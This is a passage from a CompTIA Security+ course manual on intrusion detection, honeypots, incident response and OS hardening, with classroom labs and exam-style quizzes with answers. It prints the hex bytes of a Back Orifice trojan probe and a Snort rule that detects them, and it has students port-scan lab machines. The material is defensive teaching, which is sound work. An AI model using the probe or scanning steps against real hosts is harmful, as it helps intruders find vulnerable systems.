A system has been developed to classify intrusion detection systems based on how they detect malicious activity. There are two major categories: signature detection (also known as misuse detection), and anomaly detection. Signature detections Signature detection is achieved by creating models of attacks, also called signatures. As events are monitored, they are compared to a model to determine whether the event qualifies as an intrusion. For example, most NIDS use signatures to identify attacks. The signature of a given attack could be a string of characters that appear in the payload of a packet that is part of the attack. If you used a protocol analyzer such as SnifferPro to view a Back Orifice port probe (which an attacker might execute to determine if Back Orifice is running on a potential victim host), you would see the following data in the packets payload:
CE 63 D1 D2 16 E7 13 CF 38 A5 A5 86 B2 75 4B 99 c......8....uK. AA 32 58

.2X

1216 CompTIA Security+ Certification


Now that you know what the probe looks like, a signature can be created for a NIDS. The following signature definition was created from the above sniffer trace for use with an open source IDS program called Snort:
alert UDP $EXTERNAL any -> $INTERNAL 31337 (msg: IDS397/ trojan_trojan-BackOrifice1-scan; content: | ce63 d1d2 16e7 13cf 38a5 a586|;)

The relevant part of the signature definition, the content field, appears in bold type. Notice that it matches the sniffer trace. Snort examines every packet that enters its monitoring NIC and compares the data payload against this signature. If there is an exact match, then Snort alerts the administrator that it has identified an attack using a Back Orifice port scanner. It is important that only attacks and no benign traffic should match the signatures, otherwise false alarms are generated. The signature detection method is good at detecting known attacks, but requires the sensors database be maintained with current signatures; otherwise, new attacks are not detected. A well-crafted signature nearly always detects the attack it represents, but other packets might also match the signature and generate false alarms. When false positives occur, IDS administrators tune the sensor by carefully determining the cause of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows exploit when the network has only Unix hosts), then the administrator can safely configure the sensor to ignore the signature. If the alarm is required, then the alarms context would be modified to prevent a repeat occurrence. Most signature systems are easily customizable, and knowledgeable users can create their own signatures. One problem with signature-based detection techniques is the large number of signatures required to effectively detect misuse. Since a separate signature is needed for each type of attack, a complete database of signatures can contain several hundred entries. The more signatures that each passing packet must be compared against, the slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets and potentially misses attacks as well. Despite this challenge, signature-based intrusion detection is quite popular and works well in practice when configured correctly and monitored frequently. Anomaly detections Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model. The difficulty in anomaly detection is in creating the model of normal network activity (or use model). One method of creating the use model selects key statistics about network traffic to recognize normal activity. Unfortunately, too much statistical variation makes models inaccurate, and events classified as anomalies might not always be malicious. For example, a companys employees might have the habit of returning to their desks and checking their e-mail immediately following a monthly departmental meeting. The resulting spike in activity is not normal for that time of the day or week, so the anomalybased IDS might label it as a denial-of-service attempt against the mail server.

Intrusion detection

1217

Another problem with anomaly-based detection is the inability to create a model on a completely normal network. Anomaly detection systems must create a normal use model by monitoring traffic on the specific network that they will defend. However, the network might already contain malicious activity, especially if it has an Internet connection. Any use model created from such a network would implicitly ignore such preexisting malicious activity, viewing it as normal. Anomaly detection systems arent as popular as signature detection systems because of high false alarm rates created by inaccurate models of normal use.

Intrusion detection products


The following table provides a listing of some of the better-known IDS products:
Company Aladdin Knowledge Systems Comments eSafe family provides content security against known and unknown security threats. Offers Cisco Guard 5650 and Cisco Traffic Anomaly Detector 5600. These products are aimed to deal with DDoS attacks. eTrust intrusion detection product is part of the eTrust suite.

ealaddin.com
Cisco Systems, Inc.

cisco.com
Computer Associates Intl.

ca.com
Cylant Technology

cylant.com
Enterasys Networks Inc.

CylantSecure product purports to protect against even unknown types of attacks by preventing any anomalous server activity. Dragon family includes network monitors, host-based IDS, and central console. A major player in the market, provides integrated host- and networkbased IDS. Offers SecureNet family of IDS products.

enterasys.com
Internet Security Systems Inc.

iss.net
Intrusion.com Inc.

intrusion.com
NFR Security

nfr.com
Snort

Sentivist -IDS monitors packet fragments and reassembled packets, and provides customization capabilities. The home of the well-known open source IDS, Snort.

snort.org
Symantec Host IDS www.symantec.com Sourcefire, Inc. Symantec Host IDS provides prevention, real-time monitoring and detection of security breaches. Open source network intrusion detection software, including Intrusion Sensor and Snort. Based on the former freeware tool, product detects breaches by monitoring files for unauthorized changes.

sourcefire.com
TripWire Inc.

tripwire.com

1218 CompTIA Security+ Certification


Do it!

C-1:

Discussing active and passive detection

Questions and answers


1 One way that intrusion detection systems can be categorized is based on their ability to take action when they detect suspicious activity. Passive systems do not take any action to stop or prevent the activity, which could potentially be an attack. True or false?
True

2 A system has been developed to classify intrusion detection systems based on how they detect malicious activity. What are the major categories?
A B

Signature detection Anomaly detection Abnormal detection Intrusion penetration All of the above

C D E

3 Which type of IDS can only take logging and alerting types of actions when an attack is identified? A B
C

HIDS Active system Passive system NIDS

4 What is a method of detecting intrusion in which the IDS analyze the information they gather and compare it to a database of known attacks? A B C
D

IDS Host wrappers NIDS Signature detection

5 Which IDS method is operating system-dependent?


A

Host-based Log-based Network-based Event-based

B C D

Intrusion detection 6 Which method of IDS is best suited for detecting Trojan horses such as BackOrifice? A B
C

1219

Host-based Anomaly-based Signature-based Network-based

7 Which method of IDS is capable of real-time detection?


A

Host-based Log-based Network-based Event-based

B C D

1220 CompTIA Security+ Certification

Topic D: Honeypots
This topic covers the following CompTIA Security+ exam objective:
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Honey Pots

Goals of deploying honeypots


Explanation In the broadest sense, honeypots are security resources designed with the intent that they will be probed, attacked, or compromised. They are usually programs (although one hardware honeypot product, Smoke Detector, does exist) that simulate one or more unsecured network services. Honeypots are designed to deceive attackers into thinking that the honeypot is a normal host, often with low security, in order to bait them into penetrating it. When the attacker compromises the virtual host provided by the honeypot, all of their actions are logged and recorded, including all keystrokes, changes to the virtual hosts configuration, and uploads of attack tools. Typically, the goal of deploying honeypots is in gathering information on hacker techniques, methodology, and tools. Honeypots, then, are usually deployed in two major cases: first, to conduct academic or basic research into hacker methods, and second, to detect attackers inside the organizations network perimeter. Honeypots do not have any capabilities to prevent intrusions; quite the opposite, they are designed to attract attackers just as bees are attracted to honey. Honeypots do have value in reacting to intrusions, because they make the forensic process easy for investigators. Rather than wading through gigabytes of system data in order to find the evidence they need, investigators are directly provided the data on the intruders activities by the honeypot software. Although still infrequently encountered in enterprises, honeypots are growing in popularity as a mechanism for increasing security in networks. As can be seen in the following tables, a number of commercial and open source honeypot products have been created. Most organizations have little interest in deploying honeypots for the sake of research, as that research really does not add value to their business operations. (Research honeypots are usually deployed by universities, governments, or research organizations.) When businesses deploy honeypots, the goal is usually to obtain early warning that a malicious hacker has access to the network.

Intrusion detection
Commercial honeypot Decoy Server symantec.com Specter specter.com Comments

1221

Decoy Server provides complete operating systems for attackers to interact with, and has good monitoring, data collection and notification capabilities. An easy-to-use commercial honeypot designed to run on Windows, Specter can emulate several different operating systems, monitor every ICMP packet, TCP connection and UDP datagram, and has a variety of configuration and notification features. A commercial honeypot appliance with extensive detection and emulation capabilities.

PacketDecoy palisadesys.com

Free honeypot BackOfficer nfr.com/resource/backO fficer.php Deception Toolkit all.net/dtk/dtk.html Honeyd www.honeyd.org

Comments A free Windows-based honeypot, BackOfficer is extremely easy to use and runs on any Windows platform; a good beginners honeypot. A collection of Perl scripts and C source code that emulate a variety of listening services, DTKs primary purpose is to deceive human attackers. Introduced a variety of new concepts, including the ability to monitor millions of unused IPs, IP stack spoofing, and to simulate hundreds of operating systems at the same time. Not a program, but an entire network of systems designed to be compromised. An open source solution that allows you to run multiple operating systems (and honeypots) at the same time, UML also has honeypot functionality, including the ability to capture the attackers keystrokes from kernel space; UML allows you to create an entire honeynet on a single computer.

Honeynets www.honeynet.org User Mode Linux user-modelinux.sourceforge.net

Honeypot deployment options


A honeypot can be deployed in a variety of locations in the network, depending on the goal of the person deploying it. For research purposes, directly connecting a honeypot to the Internet allows the owner to collect the most data, because hosts exposed to the Internet are attacked frequently and repeatedly. However, such a deployment offers little help in securing an organizations network. When the goal of deploying the honeypot is to add security to the network, the honeypot should be deployed inside the network where it can serve to detect attackers and alert security administrators to their presence. In this case, the honeypot should be placed where it will most likely receive the attention of an attacker, such as on a server farm or on a DMZ.

1222 CompTIA Security+ Certification Honeypot design


A few general principles apply when deploying honeypots. Perhaps most importantly, the honeypot must attract, and avoid tipping off, the attacker. This means that the honeypot should appear to have a normal operating system installation to avoid scaring off an intruder who might think the system is under surveillance. The host must also have something of interest for the intruder. Honeypots are often populated with phony data for the attacker to peruse in order to encourage repeat visits during which more data can be gathered. One needs to ensure that a honeypot does not become a staging ground for attacking other hosts, either inside or outside of the firewall. Outside the firewall, the honeypot could be used to attack other organizations, which has implications for liability of those that deploy the honeypot. Inside the firewall, the honeypot could be used to attack real servers and other network resources. However, it is unlikely that an organization would allow the intruder to continue to use a honeypot on the inside for an extended period (allowing him to upload and use attack tools on the honeypot). The goal for such organizations would be to detect and remove the intruder immediately, by closing any security gaps that allowed the intruder access to the network or by removing the employee in the case of an internal attacker.

Honeypots, ethics, and the law


There has been a debate in the white-hat community whether honeypots are ethical. After all, their goal is to deceive a potential intruder into thinking that the honeypot is a vulnerable host, and to encourage an attack on the honeypot. To some this is not only deception, but also entrapment, much like a police sting operation that induces people to commit crimes which they had no previous intention of committing. The verdict in the security community has been resounding: there is nothing wrong with deceiving an attacker into thinking that he or she is penetrating an actual host, as opposed to an intrusion detection mechanism. After all, it is the intruder that has malicious intent; the organization deploying the honeypot is merely enticing the attacker out into view. In regard to the entrapment argument, it is important to note that the honeypot does not convince one to attack it; it merely appears to be a vulnerable target. To be entrapped, one must be convinced by law enforcement officials to commit the crime. Not only is one not convinced by anyone in particular to attack the honeypot, the honeypot has nothing to do with law enforcement. It is merely a tool used to detect intruders. Honeypots are not a law enforcement tool, and it is doubtful that they could be used as evidence in court.

Intrusion detection Do it!

1223

D-1:

Working with a honeypot Heres why


BackOfficer Friendly lures out intruders by emulating a Back Orifice server, and a variety of other services such as FTP, HTTP, and SMTP. BackOfficer Friendly is located at nfr.com/resource/backOfficer.php. Although this is a Windows program, it is sometimes erroneously indicated that BackOfficer Friendly is for the Unix platform.

Heres how
See the classroom setup instructions for location of the download file. Students will have to work in pairs on this activity.

1 Download and install a copy of BackOfficer Friendly according to your Instructors directions

2 In the Taskbar, right-click the BackOfficer Friendly icon and choose Details 3 On the menu bar, choose
Options To view the Options menu.

4 What types of scans can be performed with this utility? 5 Select Listen for Telnet 6 At your partners computer, open a command window 7 Enter telnet 8 Enter o, followed by your partners computers IP address 9 At your own computer, observe what happens in the BackOfficer Friendly window

BackOfficer Friendly can listen for Back Orifice, FTP, Telnet, SMTP, HTTP, POP3 and IMAP2.

At the command prompt. For example, enter o 192.168.1.4.

The telnet connection is detected and displayed.

10 In BackOfficer Friendly, choose


Options

Enable all scanning options except Listen for ftp

In preparation for the next activity.

1224 CompTIA Security+ Certification


Do it!

D-2:

Working with SuperScan 3.0 Heres why


SuperScan 4 is a connect-based TCP port scanner, pinger, and hostname resolver. It enables you to perform ping scans and port scans using any IP address range. To conduct a scan on your own system.

Heres how
See the classroom setup instructions for location of the download file.

1 Download and install SuperScan 4 according to your Instructors direction 2 With BackOfficer Friendly still active, enter your computers IP address into the Hostname/IP box Click the right arrow next to your IP address 3 Click the blue arrow toward the bottom of the window 4 Switch back to BackOfficer Friendly

To add the IP address as an address to be scanned. To start the scan. Youll see the results being displayed in the field at the bottom of the screen. If the window didnt already pop up during the scan. The SuperScan activity displays in the window.

5 Close all open windows

Intrusion detection

1225

Topic E: Incident response


This topic covers the following CompTIA Security+ exam objective:
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Incident Response

Dealing with intrusions


Explanation The ability of intrusion detection systems and honeypots to spot attacks against your organizations information assets is all well and good. However, having deployed them, one asks: What should be done when these systems detect an intrusion? Detecting an intrusion is simply not enough. Even if the active monitoring capabilities of the IDS managed to stop the attack in progress, many questions remain. Did the attacker gain access to sensitive data? How did the attack penetrate the network? Can the attacker do it again? Should law enforcement officials be involved? Every IDS deployment should include two documents: a solid IDS monitoring policy and procedure, and an incident response plan. These documents are written to answer these what now questions: How will the IDS be monitored? Who will monitor them? How will the organization respond in the event of an alert? Who is going to fix the vulnerability?

IDS monitoring
It is an unpleasant fact that the IDS needs to be monitored. Early on in their deployment, intrusion detection systems are likely to generate a high number of false positives; and though these will decrease as the IDS is tuned, the alarms still need to be investigated to determine how to tune the IDS. Later on, when the IDS installation is mature, an IDS alarm is a serious event that requires a response. Some network operations centers have 24 by 7 monitoring, but operations staffs rarely have the experience or skills to deal with an intrusion. To monitor the IDS effectively, organizations need to have well-documented monitoring procedures that detail actions for specific alerts. When operations personnel receive an IDS alert, they can refer to these procedures to determine whom to contact and what actions should be taken immediately, based on the type of alarm generated by the IDS.

1226 CompTIA Security+ Certification Information security incident response team


Once IDS has been monitored and the correct resources notified about an intrusion, the incident handling procedure comes into play. This procedure determines the steps that response personnel should follow in addressing the security breach. The steps taken depend on the level of seriousness, so a classification system is needed to categorize alarms. A sample alarm classification scheme might look like this: Level 3: The least threatening type of alarm, a level 3 incident would include a port scan or a single unauthorized attempt to telnet to a network device. Level 2: More serious, a level 2 incident might include unsuccessful attempts to obtain unauthorized access to systems. Continued level 3 attacks could also constitute a reason for escalating to level 2. Level 1: The most serious types of attack, level 1 incidents could include major denial-of-service attacks, successful intrusions into systems, or similar activities. Each level of severity will have its own sequence of actions to follow. Typically, incidents are reported to an Information Security Incident Response Team (SIRT), (whose membership is defined in the incident-handling procedure document). The SIRT assigns personnel who will assemble all needed resources to handle the reported incident. The incident coordinator makes decisions as to the interpretation of policy, standards, and procedures when applied to the incident. Typical objectives for the SIRT are: Determine how the incident happened. Establish a process for avoiding further exploitations of the same vulnerability. Avoid escalation and further incidents. Assess the impact and damage of the incident. Recover from the incident. Update procedures as needed. Determine who was responsible (if appropriate and possible). Involve legal counsel and law enforcement officials, as deemed appropriate by the organization and the seriousness of the intrusion. Depending on the seriousness of the attack, it is possible that only a subset of the above actions would need to be addressed.

Intrusion detection Do it!

1227

E-1:

Discussing incident response

Questions and answers


1 SIRT stands for: A B
C

Security Information Response Team System Information Response Team Security Incident Response Team None of the above

2 What are some valuable steps in handling incidents? A B C D E F G


H

Determine how the incident happened. Establish a process for avoiding further exploitations of the same vulnerability. Avoid escalation and further incidents. Assess the impact and damage of the incident. Recover from the incident. Update procedures as needed. Determine who was responsible (if appropriate and possible). All of the above.

3 What information should be included in the IDS monitoring procedures?


The procedures should indicate the appropriate responsewhom to contact and what actions should be taken immediatelybased on the type of alarm generated by the IDS.

1228 CompTIA Security+ Certification

Unit summary: Intrusion detection


Topic A In this topic, you learned about intrusion detection systems and characteristics of intrusion detection products. You learned that intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. In this topic, you learned about network-based and host-based intrusion detection systems and how these products are deployed for maximum effect. You learned that, although both technologies have their own strengths and weaknesses, they offer complimentary capabilities to each other and to firewalls and can significantly add to network security when properly tuned and vigilantly monitored. In this topic, you learned about passive and active IDS. You learned that active IDS can stop or prevent an attack by blocking offending traffic at the router or firewall, while passive IDS simply logs the attack and alerts administers. You also learned about the differences between anomaly-based and signature-based IDS. In this topic, you learned about honeypots. You learned that while honeypots are still not commonly deployed in business networks, they are gaining popularity and have the capability of adding to network security by gathering information about intruders and their methods of gaining entry into the network. In this topic, you learned about IDS monitoring and incident response. You discussed the importance of having well-documented procedures and a well-trained response team in place before an incident occurs.

Topic B

Topic C

Topic D

Topic E

Review questions
1 What is the defense in depth security strategy?
A multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture.

2 Specify if each of the following are true or false positives or negatives. Occur when the IDS correctly identifies undesirable traffic.
True positive

Occur when the IDS correctly identifies normal traffic.


True negative

Occur when the IDS incorrectly identifies normal traffic as an attack.


False positive

Occur when the IDS incorrectly identifies an attack as normal traffic.


False negative

3 False negatives imply that the IDS failed to detect an attack. True or false?
True

4 False positives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
True

Intrusion detection

1229

5 What is the difference between host-based and network-based intrusion detection systems?
Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.

6 NIDS typically use two NICs. What is each used for?


One operates in promiscuous mode to sniff passing traffic and the other is an administrative NIC that is used to send data such as alerts to a centralized management system.

7 Where are the typical locations for IDS sensors?


Just inside the firewall, on the DMZ, or on any subnets containing mission-critical servers.

8 What are the typical reaction types for network IDS reactions?
TCP resets, IP session logging, and shunning or blocking.

9 HIDS audit log files, monitor file checksums, evaluate requests by application for system resources, and monitor system processes for suspicious activities. True or false?
True

10 HIDS can only detect intrusions after the fact rather than proactively protecting the host. True or false?
False

11 What are the two main types of host-based IDS?


Host wrappers and agent-based software

12 Compare passive and active IDS.


Passive systems log security events, alert administrators when an attack occurs, and record the offending traffic for analysis, but do not take any preventive action to stop the attack. Active systems have all the logging, alerting, and recording features of passive IDS, with the additional ability to take action against the offending traffic.

13 Compare signature-based and anomaly-based IDS.


Signature detection is achieved by creating models of attacks, also called signatures. As events are monitored, they are compared to a model to determine whether the event qualifies as an intrusion. Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model.

14 What is typically the goal of deploying honeypots?


To gather information on hacker techniques, methodology, and tools.

15 Which of the following is true when deploying honeypots?


A

Honeypots must attract the attacker without tipping them off.

B Honeypots should never use the normal operating system. C Only real data is of interest to attackers so phony data should never be used. D Honeypots should only be placed outside the firewall.

1230 CompTIA Security+ Certification


16 Every IDS deployment should include documents describing the monitoring policy and procedure, and an incident response plan. True or false?
True

17 Early on in their deployment, intrusion detection systems are likely to generate a high number of false negatives. True or false?
False. When first set up, they are likely to generate false positives.

18 A well-documented monitoring procedure specifies whom operations personnel should contact. Information about what to do about the intrusion is not included in this document. True or false?
False. The document does include this information.

19 Deployment of a honeypot is seen by some as entrapment and, according to them, is therefore unethical. True or false?
True

20 Honeypots cannot be used to attack legitimate systems. True or false?


False. If you do not carefully structure the honeypot environment, attackers can launch attacks against your network or other networks from this environment.

Independent practice activities


Installing Snort on Windows-based systems Snort is an example of an IDS solution. After completing this activity, youll know how to install Snort for Windows. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 Log on to Server-X as Administrator. (If necessary) 2 Verify that WinPcap is installed on the server. (If it isnt, download WinPcap_3_1.exe according to your Instructors direction. Double-click the WinPcap_3_1.exe file, click Next three times, click OK and reboot Server-X and log on as Administrator.) 3 Create a folder called snort on C:\ (your local hard drive). 4 Download snort_243_Installer.exe from www.snort.org/dl/binaries/win32 to the snort folder. 5 Double-click the snort_243_Installer.exe file to start the installation. Accept all defaults and choose C:\snort as the destination folder. 6 Rename the snort.conf file in C:\snort\etc to snort.old. 7 Open snort.old with Wordpad (not Notepad). 8 Save the snort.old file as snort.conf in a text format. 9 Close Wordpad. 10 Rename the snort.conf.txt file to snort.conf. 11 Click Yes to accept the format change. 12 Repeat steps 1-11 above on Server-Y.

Intrusion detection Capturing packets with Snort

1231

After completing this activity, youll be able to understand how to use Snort to capture data packets, view the contents of the data packets, and create log files. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 On Server-X, click Start, Run, and type cmd. 2 Click OK. 3 Type cd \snort\bin and press Enter. 4 Enter snort W. Youll see a list of the available interfaces, each with a number assigned to it (1, 2, and so on). 5 Type snort v i followed by the number of the interface you want to listen to. For example, you might type snort v i 2 to listen to interface 2. 6 Press Enter. Youll see a screen similar to the one shown in Exhibit 12-4 below.

Exhibit 12-4: The snort interface initialization screen 7 On Server-Y, click Start, Run, and type cmd. 8 Click OK. 9 Type ping Server-X and press Enter. 10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and ECHO REPLY.

1232 CompTIA Security+ Certification

Exhibit 12-5: A Snort ping capture 11 On Server-X, press Ctrl+C to view the statistics, as shown in Exhibit 12-6. Notice that the protocols used were ICMP and ARP.

Exhibit 12-6: Snort ping capture statistics 12 On Server-X, at the command line enter snort v d i followed by the interface number to view the packet data. 13 On Server-Y, enter ping Server-X. 14 On Server-X, view the results. Youll see a screen similar to the one shown in Exhibit 12-7.

Intrusion detection

1233

Exhibit 12-7: A Snort ping capture with data 15 On Server-X, press Ctrl+C. 16 On Server-X, enter snort dev l \snort\log K ascii i followed by the interface number to log results to a log file. 17 Ping Server-X from Server-Y. 18 On Server-X, press Ctrl+C. 19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open the files in the subfolder(s). 20 Repeat Steps 1 through 20 above in Server-Y. 21 Close all Windows. Creating a Snort rule set In this activity, youll create a simple Snort rule to alert you when the ICMP protocol is used. After completing this activity, youll be able to create a Snort rule set, and test the rules set on the network. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 Log on to Server-X as Administrator. (If necessary.) 2 Click Start, Run, and type notepad. 3 Click OK. 4 Enter the information shown in Exhibit 12-8.

1234 CompTIA Security+ Certification

Exhibit 12-8: A Snort rule set 5 Save the file as c:\snort\new.rules. Close Notepad. 6 Rename c:\snort\new.rules.txt to c:\snort\new.rules. Accept the format change when prompted. 7 On Server-X, open a Command window. 8 At the command line, enter cd \snort\bin. 9 At the command line, enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 10 From Server-Y, open Internet Explorer and enter http://Server-Xs IP address in the address box. Press Enter. 11 On Server-X, press Ctrl+C. 12 Navigate to the C:\snort\log folder. 13 In Server-Ys subfolder, examine the Web Traffic Logged in the TCP_*-80.ids files. It should look similar to Exhibit 12-9.

Exhibit 12-9: A Snort log file containing Web traffic

Intrusion detection

1235

14 On Server-X, change to the c:\snort\bin directory and then enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 15 On Server-Y, ping Server-X. 16 On Server-X, press Ctrl+C. 17 Navigate to the C:\snort\log folder. 18 Examine the contents of the alert.ids file. It should look similar to the one shown in Exhibit 12-10.

Exhibit 12-10: A Snort ICMP traffic alert log 19 Repeat steps 1-18 above on Server-Y. 20 Close all Windows and log off Server-X and Server-Y.

1236 CompTIA Security+ Certification

131

Unit 13 Security baselines


Unit time: 180 minutes Complete this unit, and youll know how to:
A Gain an understanding of OS/NOS

vulnerabilities and hardening practices.


B Explore common network hardening

practices, including firmware updates, access control lists, and configuration best practices.
C Harden application-layer servicessuch as

Web, e-mail, FTP, DNS, file/print, DHCP, and database repositoriesagainst attacks.
D Explain how to properly configure

workstations and servers and implement personal firewall software and antivirus packages.

132

CompTIA Security+ Certification

Topic A: OS/NOS hardening


This topic covers the following CompTIA Security+ exam objectives:
# 1.3 3.5 Objective Non-essential Services and Protocols Disabling unnecessary systems / process / programs. Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system OS / NOS (Operating System / Network Operating System) Hardening File System Updates (Hotfixes, Service Packs, Patches)

Securing the operating system


Explanation Operating system/network operating system (OS/NOS) hardening is the process of modifying an operating systems default configuration to make it more secure from outside threats. This process might include removing unnecessary programs and services, setting access privileges, and applying patches to the system kernel to limit vulnerability. The OS can essentially be considered the brain of a typical computer system. Operating systems not only establish communication between the hardware and the software running on it, but also manage and facilitate the distribution of system resources across different tasks (as shown in Exhibit 13-1).

Exhibit 13-1: OS/NOS hardening

Security baselines

133

Its extremely important, therefore, for system administrators to protect the integrity and availability of operating systems from outside threats. Actions that could disrupt the functionality of a system can be categorized as follows: AttacksThese are intentional acts by malicious individuals either to gain unauthorized access to user data and system resources or to compromise other targets. MalfunctionsThese are hardware or software failures that may prevent a system from performing its tasks. ErrorsThese are unintentional acts, by external or internal users, that may adversely affect the functionality of a system.

Best practices
Although its almost impossible to achieve complete security of a system when its deployed as part of a network, IT managers can follow certain guidelines to safeguard the system from intruders. Following is a common list of best practices for operating system hardening: Identify and remove unused applications and services, which, if compromised, can reveal sensitive information about a system. Remove unused or unnecessary file shares. Implement and enforce strong password policies. Force periodic password changes. Remove or disable all expired or unneeded accounts. Limit the number of administrator accounts available. Set necessary privileges to ensure that resources are accessible on an as-needed basis. Set account lockout policies to discourage password cracking. Keep track of the latest security updates and hot fixes. Apply vendor-suggested upgrades and patches as they are made available. Back up the system on a periodic basis for restoration in case of emergency. Log all user account and administrative activity so you can conduct forensic analysis if the system is compromised. Documentation Keeping an external log of each critical system can increase system integrity and make future security-related maintenance much simpler. This hard log should include a list of all software and version numbers that are installed on the system. As users, groups, and access privileges are defined, and other critical decisions are made during the baselining process, they should be recorded in this document. Records of all backups and upgrades should also be maintained in this single reference. When a security patch is recommended for a certain combination of operating system and applications, you wont need to dig around in your active system to see if it applies; simply refer to the paper logs. A recommended method is to use a composition book for each critical system. Its obvious when pages are removed (they never should be), and its easy to take with you to analyze.

134
Do it!

CompTIA Security+ Certification

A-1:

Using the Microsoft Baseline Security Analyzer Heres why


Microsoft Baseline Security Analyzer (MBSA) can scan local and remote machines for security issues with Microsoft Windows NT 4, Windows 2000, Windows Server 2003, Windows XP, IIS, SQL Server, Internet Explorer, and Office. Reports are generated with details after the scan is complete. In this activity, youll install MBSA and view the results. To download this file from Microsofts web site, go to www.microsoft.com/downloads. Search using the keyword mbsa.

Heres how
1 Log on to your server as Administrator

See the classroom setup instructions for location of the download file.

2 Download mbsasetup-en.msi according to your Instructors directions 3 Double-click the mbsasetupen.msi file Click Next 4 Select I accept the license
agreement

To start the MBSA Setup wizard.

Click Next 5 Click Next 6 Click Install 7 Click OK 8 Click Start, then choose All
Programs, Microsoft Baseline Security Analyzer 2.0 To acknowledge that the installation has finished. To start the program. To use the default folder.

Security baselines 9 Click Scan a computer Maximize the window


If necessary.

135

10 Click Start scan

(In the lower-left corner of the window.) Security update information downloads from the Internet and the scan begins. Note that this process may take some time to complete. The report shows what was scanned, the results of the scan, and how to fix any problems.

11 After the scan is complete, view the report 12 Close all windows

136
Do it!

CompTIA Security+ Certification

A-2:

Discussing system hardening

Questions and answers


1 Which of the following should be included in a list of system hardening best practices? (Choose all that apply.) A
B C D

Deny data access to all users but a select few. Identify and remove unused applications and services. Implement and enforce strong password policies. Limit the number of administrator accounts.

2 Which of the following are not actions that could disrupt the functionality of a system? A B C
D

Attacks Malfunctions Errors Data errors

3 Which of the following three statements about OS/NOS hardening is not true? A
B

OS/NOS hardening includes removal of unnecessary programs. OS/NOS hardening includes application hardening. OS/NOS hardening includes applying or adding patches to the system kernel.

Security baselines

137

File systems
Explanation File systems store data necessary to enable communication between an application and its supporting disk drives. File systems require special attention when youre securing the OS. Strong file-system security can not only stop inside file tampering but also stop hackers who have gained access to the system but not the files. Access privileges Operating systems provide the capability to set access privileges for files, directories, devices, and other data or code objects. Setting privileges and access controls protects information stored on the computer. Common privileges that can be set on files and directories are Read, Write, and Execute privileges. Denying Read access protects confidentiality of information. Denying Write access protects the integrity of information from unauthorized modification. Restricting execution privileges of most system-related tools to system administrators can prevent users and attackers from making intentional or unintentional configuration changes that could damage security. The principle of least privilege states that users should have the minimum amount of access needed to perform their jobs. Although it may be easier to give all employees access to a file repository so that they can easily share a file as its being modified, this practice opens up many possibilities for a breach of security. It might also be necessary to distinguish local access privileges from network access privileges. Application programs may request and be granted increased access privileges for some of their automated operations. On the other hand, a system administrator may want to limit users privileges based on their required scope. This can be done in a number of ways, as outlined in the following sections. Setting user and group privileges To assist in privilege assignment, the administrator should determine user groups and object groups, and identify required access for each object (file, directory, device) by each user group within the system. When setting privileges for users, you can usually simplify both the initial task and future updates by grouping users by common needs. Most operating systems allow rights to be granted to a group, which then propagates those privileges to all members of the group. For instance, all corporate accountants may have access to a folder of resources, accounting software, and several printers in a section of the building. Rights to each of those resources could be granted to the accounting group, and all accountants could be added to that group. If a new, generally available accounting resource is added, an administrator need only add it to the accounting group for all accountants to have access. Similarly, when an accountant is transferred to a different division, his or her user account is removed from the accounting group, thereby revoking in a single action the multiple accounting privileges that are no longer needed. Using groups does not prevent you from granting additional rights to a single user. Those would simply be added directly to the user account. Be sure to identify rights that are made available to a set of users because those users might be better represented by a group of users. Its also possible for a single user to gain privileges via membership in multiple groups in addition to those rights granted explicitly.

138

CompTIA Security+ Certification Configuring access controls

Emphasize that these are only guidelines, and adjustments might be needed to suit a particular environment. Remind students that the ultimate goal is to provide users with the least amount of access needed to accomplish their jobs.

When creating user groups, a system administrator configures the operating system to recognize the user groups, and then assigns individual users to the appropriate groups. Then, the system administrator configures access controls for all protected files, directories, devices, and other objects. The administrator should document all the configured permissions along with the rationales for them. Following are some of the common practices for setting file and data privileges: Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. For UNIX systems, there should be no world-writable files unless specifically required by necessary application programs. For Windows NT-based systems, there should be no permissions allowing the Everyone group to modify files. For UNIX systems, if possible, mount file systems as read only and nosuid to preclude unauthorized changes to files and programs. Assign an access permission of immutable to all kernel files if its supported by the operating system (such as Linux). Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. Ensure that you configure the operating system so that newly created files and directories inherit appropriate access controls, and that access controls propagate down the directory hierarchies as intended when you assign them. Administrators should disable a subdirectorys ability to override top-level security directives unless that override is required. Malicious users can exploit a failure to use such practices and gain unauthorized access to other parts of the system. Implementing access control with Windows Server 2003 security templates One of the more difficult tasks for an administrator is determining the appropriate security settings for a network. There are so many possibilities that its very easy to miss an important setting, often resulting in a network full of security holes. Microsoft has created security templates to assist administrators with this task. In addition, Microsoft gives administrators the ability to create custom templates.

Do it!

A-3:

Defining security templates in Windows Server 2003 Heres why

Heres how
1 Choose Start, Run Type mmc and press e 2 Choose File, Add/Remove
Snap-in

To open the Add/Remove Snap-in window.

3 Click Add

To open the Add Standalone Snap-in window.

